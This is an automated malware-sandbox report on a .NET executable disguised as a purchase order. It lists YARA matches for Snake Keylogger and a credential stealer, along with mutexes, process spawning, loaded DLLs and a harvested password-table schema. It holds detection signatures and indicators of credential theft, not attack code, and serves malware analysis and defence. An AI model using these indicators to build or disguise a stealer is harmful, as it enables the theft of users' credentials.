Source: 1.2.new order 00041221.exe.38fa868.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 1.2.new order 00041221.exe.38fa868.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 1.2.new order 00041221.exe.38fa868.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000003.00000002.3707232518.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000001.00000002.1271925183.0000000003859000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000001.00000002.1271925183.00000000038FA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: new order 00041221.exe PID: 1000, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: new order 00041221.exe PID: 5292, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
.NET source code contains very large array initializations
Source: new order 00041221.exe, BaseTypeRequiredAttribute.cs Large array initialization: : array initializer size 620175
Initial sample is a PE file and has a suspicious name
Source: initial sample Static PE information: Filename: new order 00041221.exe
Abnormal high CPU Usage
Source: C:\Users\user\Desktop\new order 00041221.exe Process Stats: CPU usage > 49%
Detected potential crypto function
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 1_2_04C86F4C 1_2_04C86F4C
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 1_2_04C83E3C 1_2_04C83E3C
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 1_2_04C85858 1_2_04C85858
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 1_2_04C85868 1_2_04C85868
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 1_2_04C87810 1_2_04C87810
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 1_2_04DD65D0 1_2_04DD65D0
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 1_2_04DDE4F4 1_2_04DDE4F4
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 1_2_04DD7328 1_2_04DD7328
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 1_2_04DF75C0 1_2_04DF75C0
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 1_2_04DF4640 1_2_04DF4640
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 1_2_04DFB250 1_2_04DFB250
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 1_2_04DFB260 1_2_04DFB260
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 1_2_04DF3B60 1_2_04DF3B60
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 1_2_06B77240 1_2_06B77240
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 1_2_06B70040 1_2_06B70040
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 1_2_06B746B0 1_2_06B746B0
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 1_2_06B746A2 1_2_06B746A2
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 1_2_06B77240 1_2_06B77240
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 1_2_06B72FD8 1_2_06B72FD8
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 1_2_06B73410 1_2_06B73410
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 1_2_06B73400 1_2_06B73400
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 1_2_06B7A290 1_2_06B7A290
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 1_2_06B74AE8 1_2_06B74AE8
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 1_2_06B74AD8 1_2_06B74AD8
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 1_2_06B72BA0 1_2_06B72BA0
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 1_2_06B72B80 1_2_06B72B80
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 1_2_06B70006 1_2_06B70006
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 3_2_0127C146 3_2_0127C146
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 3_2_0127A088 3_2_0127A088
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 3_2_01275362 3_2_01275362
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 3_2_0127D2CA 3_2_0127D2CA
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 3_2_0127D599 3_2_0127D599
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 3_2_0127C468 3_2_0127C468
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 3_2_0127C738 3_2_0127C738
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 3_2_012769A0 3_2_012769A0
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 3_2_012729E0 3_2_012729E0
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 3_2_0127CD28 3_2_0127CD28
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 3_2_0127EC18 3_2_0127EC18
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 3_2_0127CFF7 3_2_0127CFF7
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 3_2_01276FC8 3_2_01276FC8
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 3_2_0127F7F1 3_2_0127F7F1
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 3_2_0127EC0A 3_2_0127EC0A
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 3_2_0127FC48 3_2_0127FC48
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 3_2_01273E09 3_2_01273E09
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 3_2_05A397B0 3_2_05A397B0
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 3_2_05A35290 3_2_05A35290
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 3_2_05A39ED8 3_2_05A39ED8
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 3_2_05A3F1B9 3_2_05A3F1B9
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 3_2_05A39590 3_2_05A39590
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 3_2_05A38DF9 3_2_05A38DF9
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 3_2_05A3F1C8 3_2_05A3F1C8
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 3_2_05A3E908 3_2_05A3E908
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 3_2_05A3E918 3_2_05A3E918
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 3_2_05A32970 3_2_05A32970
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 3_2_05A3ED70 3_2_05A3ED70
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 3_2_05A3E4B3 3_2_05A3E4B3
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 3_2_05A3E4C0 3_2_05A3E4C0
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 3_2_05A30023 3_2_05A30023
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 3_2_05A3DC01 3_2_05A3DC01
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 3_2_05A3DC10 3_2_05A3DC10
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 3_2_05A3E068 3_2_05A3E068
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 3_2_05A30040 3_2_05A30040
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 3_2_05A3E059 3_2_05A3E059
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 3_2_05A31BA8 3_2_05A31BA8
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 3_2_05A3D7B8 3_2_05A3D7B8
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 3_2_05A31B97 3_2_05A31B97
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 3_2_05A30B20 3_2_05A30B20
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 3_2_05A30B30 3_2_05A30B30
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 3_2_05A3CF08 3_2_05A3CF08
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 3_2_05A3D360 3_2_05A3D360
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 3_2_05A35280 3_2_05A35280
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 3_2_05A32288 3_2_05A32288
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 3_2_05A3F620 3_2_05A3F620
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 3_2_05A38E08 3_2_05A38E08
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 3_2_05A3F610 3_2_05A3F610
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 3_2_05A3FA6B 3_2_05A3FA6B
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 3_2_05A39E69 3_2_05A39E69
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 3_2_05A3FA78 3_2_05A3FA78
Source: C:\Users\user\Desktop\new order 00041221.exe Code function: 3_2_05A32278 3_2_05A32278
Sample file is different than original file name gathered from version info
Source: new order 00041221.exe, 00000001.00000002.1269553878.000000000079E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs new order 00041221.exe
Source: new order 00041221.exe, 00000001.00000002.1278242473.0000000006AD0000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameTyrone.dll8 vs new order 00041221.exe
Source: new order 00041221.exe, 00000001.00000002.1271292903.0000000002851000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMML.dll2 vs new order 00041221.exe
Source: new order 00041221.exe, 00000001.00000002.1271292903.00000000028AB000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameRemington.exe4 vs new order 00041221.exe
Source: new order 00041221.exe, 00000001.00000002.1277540501.0000000004E00000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameMML.dll2 vs new order 00041221.exe
Source: new order 00041221.exe, 00000001.00000000.1238190903.0000000000338000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameJUWJ.exe2 vs new order 00041221.exe
Source: new order 00041221.exe, 00000001.00000002.1271925183.0000000003A2E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameTyrone.dll8 vs new order 00041221.exe
Source: new order 00041221.exe, 00000001.00000002.1271925183.0000000003859000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameRemington.exe4 vs new order 00041221.exe
Source: new order 00041221.exe, 00000001.00000002.1271925183.00000000038FA000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameRemington.exe4 vs new order 00041221.exe
Source: new order 00041221.exe, 00000003.00000002.3708230795.00000000010F7000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: OriginalFilenameUNKNOWN_FILET vs new order 00041221.exe
Source: new order 00041221.exe, 00000003.00000002.3707232518.0000000000402000.00000040.00000400.00020000.00000000.sdmp Binary or memory string: OriginalFilenameRemington.exe4 vs new order 00041221.exe
Source: new order 00041221.exe Binary or memory string: OriginalFilenameJUWJ.exe2 vs new order 00041221.exe
Uses 32bit PE files
Source: new order 00041221.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Yara signature match
Source: 1.2.new order 00041221.exe.3859970.3.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 1.2.new order 00041221.exe.3859970.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 1.2.new order 00041221.exe.3859970.3.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 1.2.new order 00041221.exe.3859970.3.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 1.2.new order 00041221.exe.3859970.3.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 3.2.new order 00041221.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 1.2.new order 00041221.exe.3859970.3.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 1.2.new order 00041221.exe.38fa868.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 3.2.new order 00041221.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 1.2.new order 00041221.exe.38fa868.2.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 3.2.new order 00041221.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 1.2.new order 00041221.exe.38fa868.2.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 1.2.new order 00041221.exe.38fa868.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 1.2.new order 00041221.exe.38fa868.2.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 1.2.new order 00041221.exe.38fa868.2.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000003.00000002.3707232518.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000001.00000002.1271925183.0000000003859000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000001.00000002.1271925183.00000000038FA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: new order 00041221.exe PID: 1000, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: new order 00041221.exe PID: 5292, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: new order 00041221.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 1.2.new order 00041221.exe.38fa868.2.raw.unpack, -A.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 1.2.new order 00041221.exe.38fa868.2.raw.unpack, -.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 1.2.new order 00041221.exe.38fa868.2.raw.unpack, -.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 1.2.new order 00041221.exe.3859970.3.raw.unpack, -A.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 1.2.new order 00041221.exe.3859970.3.raw.unpack, -.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 1.2.new order 00041221.exe.3859970.3.raw.unpack, -.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 1.2.new order 00041221.exe.3c588c0.1.raw.unpack, roTOmjLT5gBK2EC4ca.cs Security API names: _0020.SetAccessControl
Source: 1.2.new order 00041221.exe.3c588c0.1.raw.unpack, roTOmjLT5gBK2EC4ca.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 1.2.new order 00041221.exe.3c588c0.1.raw.unpack, roTOmjLT5gBK2EC4ca.cs Security API names: _0020.AddAccessRule
Source: 1.2.new order 00041221.exe.3bd3aa0.4.raw.unpack, WWoXcRNneectu4WPwU.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 1.2.new order 00041221.exe.3bd3aa0.4.raw.unpack, roTOmjLT5gBK2EC4ca.cs Security API names: _0020.SetAccessControl
Source: 1.2.new order 00041221.exe.3bd3aa0.4.raw.unpack, roTOmjLT5gBK2EC4ca.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 1.2.new order 00041221.exe.3bd3aa0.4.raw.unpack, roTOmjLT5gBK2EC4ca.cs Security API names: _0020.AddAccessRule
Source: 1.2.new order 00041221.exe.3c588c0.1.raw.unpack, WWoXcRNneectu4WPwU.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@3/1@6/4
Source: C:\Users\user\Desktop\new order 00041221.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\new order 00041221.exe.log Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Mutant created: NULL
Source: C:\Users\user\Desktop\new order 00041221.exe Mutant created: \Sessions\1\BaseNamedObjects\EcCdSAIhNcVisQpsLrNIP
Source: new order 00041221.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: new order 00041221.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\new order 00041221.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: new order 00041221.exe, 00000003.00000002.3711414422.000000000318D000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3711414422.000000000315B000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3711414422.000000000313D000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3711414422.000000000314D000.00000004.00000800.00020000.00000000.sdmp, new order 00041221.exe, 00000003.00000002.3711414422.0000000003180000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: new order 00041221.exe Virustotal: Detection: 41%
Source: new order 00041221.exe ReversingLabs: Detection: 47%
Source: unknown Process created: C:\Users\user\Desktop\new order 00041221.exe "C:\Users\user\Desktop\new order 00041221.exe"
Source: C:\Users\user\Desktop\new order 00041221.exe Process created: C:\Users\user\Desktop\new order 00041221.exe "C:\Users\user\Desktop\new order 00041221.exe"
Source: C:\Users\user\Desktop\new order 00041221.exe Process created: C:\Users\user\Desktop\new order 00041221.exe "C:\Users\user\Desktop\new order 00041221.exe" Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Section loaded: dwrite.dll Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\new order 00041221.exe Section loaded: dpapi.dll Jump to behavior
